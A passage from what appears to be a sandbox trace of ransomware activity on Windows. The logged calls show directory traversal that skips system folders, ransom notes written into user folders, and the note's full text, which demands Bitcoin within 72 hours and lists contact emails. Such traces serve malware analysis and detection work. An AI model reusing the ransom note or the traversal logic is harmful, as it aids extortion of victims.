gerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0181.002] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1
	[0181.002] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb81e0f6a, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb81e0f6a, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1
	[0181.002] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1
	[0181.003] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1
	[0181.003] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1
	[0181.003] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1
	[0181.003] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1
	[0181.003] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1
	[0181.003] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1
	[0181.003] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb82ebf88, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb82ebf88, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1
	[0181.006] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb82ebf88, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb82ebf88, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0
	[0181.006] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0181.006] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0181.007] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0181.007] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\*.*"
	[0181.007] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.007] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.007] wsprintfW (in: param_1=0x18caa0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\HELP_DECRYPT_YOUR_FILES.TXT") returned 49
	[0181.008] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0181.039] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0181.039] WriteFile (in: hFile=0x37c, lpBuffer=0x18be58*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18cd7c, lpOverlapped=0x0 | out: lpBuffer=0x18be58*, lpNumberOfBytesWritten=0x18cd7c*=0xc46, lpOverlapped=0x0) returned 1
	[0181.042] CloseHandle (hObject=0x37c) returned 1
	[0181.042] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18be28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18be28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.042] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.042] GetUserNameA (in: lpBuffer=0x18bd0c, pcbBuffer=0x18be24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18be24) returned 1
	[0181.046] wsprintfW (in: param_1=0x18cca8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0181.046] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0181.046] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0181.047] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0181.047] WriteFile (in: hFile=0x37c, lpBuffer=0x18cca8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18cd84, lpOverlapped=0x0 | out: lpBuffer=0x18cca8*, lpNumberOfBytesWritten=0x18cd84*=0x30, lpOverlapped=0x0) returned 1
	[0181.047] CloseHandle (hObject=0x37c) returned 1
	[0181.048] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.049] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.049] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0181.049] wsprintfW (in: param_1=0x18ca60, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\HELP_DECRYPT_YOUR_FILES.HTML") returned 50
	[0181.051] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0181.052] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0181.052] WriteFile (in: hFile=0x37c, lpBuffer=0x18c254*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18cd78, lpOverlapped=0x0 | out: lpBuffer=0x18c254*, lpNumberOfBytesWritten=0x18cd78*=0x808, lpOverlapped=0x0) returned 1
	[0181.054] CloseHandle (hObject=0x37c) returned 1
	[0181.055] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.055] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18c23c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18c23c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.056] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.056] GetUserNameA (in: lpBuffer=0x18c120, pcbBuffer=0x18c238 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18c238) returned 1
	[0181.057] wsprintfA (in: param_1=0x18cc68, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.057] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0181.057] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0181.057] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.058] WriteFile (in: hFile=0x37c, lpBuffer=0x18cc68*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18cd80, lpOverlapped=0x0 | out: lpBuffer=0x18cc68*, lpNumberOfBytesWritten=0x18cd80*=0x43, lpOverlapped=0x0) returned 1
	[0181.058] CloseHandle (hObject=0x37c) returned 1
	[0181.058] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x85727d99, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0181.058] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\*.*") returned 25
	[0181.058] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.058] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\*.*", cchLength=0x19 | out: lpsz="c:\\users\\rdhj0cnfevzx\\*.*") returned 0x19
	[0181.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.059] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="windows") returned 0x0
	[0181.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.059] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="boot") returned 0x0
	[0181.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.059] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="system volume information") returned 0x0
	[0181.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.060] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0181.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.060] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="temp") returned 0x0
	[0181.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.060] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="program files") returned 0x0
	[0181.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.060] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="program files (x86)") returned 0x0
	[0181.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.061] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="appdata") returned 0x0
	[0181.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.061] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="application data") returned 0x0
	[0181.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.061] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="winnt") returned 0x0
	[0181.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.061] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="tmp") returned 0x0
	[0181.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.062] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="cache") returned 0x0
	[0181.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.062] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="temporary internet files") returned 0x0
	[0181.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.062] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="webcache") returned 0x0
	[0181.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.062] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="inetcache") returned 0x0
	[0181.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.063] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="nvidia") returned 0x0
	[0181.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.072] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="packages") returned 0x0
	[0181.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.072] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="cookies") returned 0x0
	[0181.072] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.073] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\*.*", lpSrch="programdata") returned 0x0
	[0181.073] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0181.073] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0181.073] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x85727d99, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0181.073] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0181.073] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1
	[0181.073] lstrcmpW (lpString1="AppData", lpString2="..") returned 1
	[0181.073] lstrcmpW (lpString1="AppData", lpString2=".") returned 1
	[0181.073] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0181.073] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0181.074] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="AppData" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData") returned="C:\\Users\\RDhJ0CNFevzX\\AppData"
	[0181.074] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData") returned="C:\\Users\\RDhJ0CNFevzX\\AppData"
	[0181.074] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\"
	[0181.074] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\"
	[0181.074] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*"
	[0181.074] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0181.074] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*") returned 33
	[0181.074] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.075] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*", cchLength=0x21 | out: lpsz="c:\\users\\rdhj0cnfevzx\\appdata\\*.*") returned 0x21
	[0181.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.075] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="windows") returned 0x0
	[0181.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.075] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="boot") returned 0x0
	[0181.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.075] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="system volume information") returned 0x0
	[0181.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.076] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0181.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.076] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="temp") returned 0x0
	[0181.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.076] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="program files") returned 0x0
	[0181.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.076] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0181.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.077] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="appdata") returned="appdata\\*.*"
	[0181.077] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0181.077] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData") returned="C:\\Users\\RDhJ0CNFevzX\\AppData"
	[0181.077] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*"
	[0181.077] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.077] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.077] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\HELP_DECRYPT_YOUR_FILES.TXT") returned 57
